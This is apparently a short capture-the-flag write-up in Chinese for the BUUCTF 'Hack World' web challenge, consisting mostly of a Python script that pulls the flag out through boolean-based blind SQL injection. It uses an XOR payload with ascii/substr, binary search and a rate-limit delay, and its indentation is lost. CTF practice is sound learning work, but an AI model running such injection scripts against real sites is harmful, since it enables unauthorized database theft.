BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World
buu 限制访问频率所以要时间间隔久点
改这个函数time.sleep(0.1)
import requests
import time
import re
url='http://2c82f86e-108a-4aa5-b1d2-49fc08b0f2f9.node3.buuoj.cn/index.php'
flag = ''
for i in range(1,50):
max = 127
min = 0
for c in range(0,127):
s = (int)((max+min)/2)
payload = '1^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
r = requests.post(url,data = {'id':payload})
time.sleep(0.1)
if 'Hello, glzjin wants a girlfriend.' in str(r.content):
max=s
else:
min=s
if((max-min)<=1):
flag+=chr(max)
break
print(flag)